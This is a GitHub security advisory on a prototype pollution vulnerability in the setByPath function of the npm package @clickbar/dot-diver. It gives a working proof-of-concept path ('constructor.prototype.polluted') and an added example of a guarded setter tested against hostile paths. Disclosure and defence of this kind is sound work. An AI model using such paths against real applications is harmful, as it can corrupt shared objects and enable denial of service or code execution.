Headline
GHSA-9w5f-mw3p-pj47: Prototype Pollution(PP) vulnerability in setByPath
Summary
There is a Prototype Pollution (PP) vulnerability in dot-diver. It can lead to RCE.
Details
//https://github.com/clickbar/dot-diver/tree/main/src/index.ts:277
// eslint-disable-next-line @typescript-eslint/no-unsafe-member-access
objectToSet[lastKey] = value
This assignment performs no validation against Prototype Pollution.
PoC
import { getByPath, setByPath } from '@clickbar/dot-diver'
console.log({}.polluted); // undefined
setByPath({},'constructor.prototype.polluted', 'foo');
console.log({}.polluted); // foo
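One way to add the missing validation around the assignment shown in Details, as an added example that is neither dot-diver's code nor the fix shipped in 1.0.2. `safeSetByPath`, `BLOCKED_KEYS` and `checkPaths` are hypothetical names, and the sample paths are constructed.

```javascript
// Added example: hypothetical guarded setter, not dot-diver's own code.
const BLOCKED_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

function safeSetByPath(target, path, value) {
  if (target === null || typeof target !== 'object') {
    throw new TypeError('target must be an object');
  }
  const keys = String(path).split('.');
  // Reject the whole path before writing anything, so a refused call
  // leaves the target untouched.
  for (const key of keys) {
    if (BLOCKED_KEYS.has(key)) {
      throw new Error(`unsafe path segment: ${key}`);
    }
  }
  let current = target;
  for (const key of keys.slice(0, -1)) {
    // Descend only through own properties; inherited values are replaced
    // by a fresh object instead of being followed up the prototype chain.
    const own = Object.prototype.hasOwnProperty.call(current, key);
    if (!own || current[key] === null || typeof current[key] !== 'object') {
      current[key] = {};
    }
    current = current[key];
  }
  current[keys[keys.length - 1]] = value;
  return target;
}

// Constructed sample paths: one ordinary, two that target the prototype.
function checkPaths() {
  const paths = ['user.name', 'constructor.prototype.polluted', '__proto__.polluted'];
  return paths.map((path) => {
    try {
      safeSetByPath({}, path, 'foo');
      return { path, accepted: true };
    } catch (err) {
      return { path, accepted: false };
    }
  });
}

console.log(checkPaths());
console.log({}.polluted); // stays undefined
```

The check runs over every segment before the first write, so a rejected path cannot leave partially created intermediate objects behind.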
Impact
It is Prototype Pollution (PP) and it can lead to DoS, RCE, etc.
Credits
Team : NodeBoB
최지혁 ( Jihyeok Choi )
이동하 ( Lee Dong Ha of ZeroPointer Lab )
강성현 ( kang seonghyeun )
박성진 ( sungjin park )
김찬호 ( Chanho Kim )
이수영 ( Lee Su Young )
김민욱 ( MinUk Kim )
- GitHub Advisory Database
- GitHub Reviewed
- CVE-2023-45827
High severity GitHub Reviewed Published Nov 2, 2023 in clickbar/dot-diver • Updated Nov 3, 2023
Package
@clickbar/dot-diver (npm)
Affected versions
< 1.0.2
References
- GHSA-9w5f-mw3p-pj47
- clickbar/dot-diver@9790834
Published to the GitHub Advisory Database
Nov 3, 2023
Related news
Dot diver is a lightweight, powerful, and dependency-free TypeScript utility library that provides types and functions to work with object paths in dot notation. In versions prior to 1.0.2 there is a Prototype Pollution vulnerability in the `setByPath` function which can lead to remote code execution (RCE). This issue has been addressed in commit `98daf567`, which has been included in release 1.0.2. Users are advised to upgrade. There are no known workarounds for this vulnerability.